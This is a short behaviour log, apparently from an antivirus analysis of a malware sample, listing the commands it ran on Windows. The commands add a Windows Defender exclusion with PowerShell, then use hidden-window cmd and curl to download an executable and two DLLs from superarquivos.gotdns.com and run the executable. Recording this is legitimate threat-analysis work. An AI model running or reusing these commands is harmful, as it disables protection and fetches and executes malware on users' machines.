Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%WINDIR%fileseguranca'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath '%WINDIR%fileseguranca'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C curl http://superarquivos.gotdns.com/puxar/original.exe --output %WINDIR%fileseguranca\original.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C curl http://superarquivos.gotdns.com/puxar/shfolder.dll --output %WINDIR%fileseguranca\shfolder.dll' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C curl http://superarquivos.gotdns.com/puxar/vcruntime140.dll --output %WINDIR%fileseguranca\vcruntime140.dll' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C %WINDIR%fileseguranca\original.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C curl http://superarquivos.gotdns.com/puxar/original.exe --output %WINDIR%fileseguranca\original.exe
- '<SYSTEM32>\cmd.exe' /C curl http://superarquivos.gotdns.com/puxar/shfolder.dll --output %WINDIR%fileseguranca\shfolder.dll
- '<SYSTEM32>\cmd.exe' /C curl http://superarquivos.gotdns.com/puxar/vcruntime140.dll --output %WINDIR%fileseguranca\vcruntime140.dll
- '<SYSTEM32>\cmd.exe' /C %WINDIR%fileseguranca\original.exe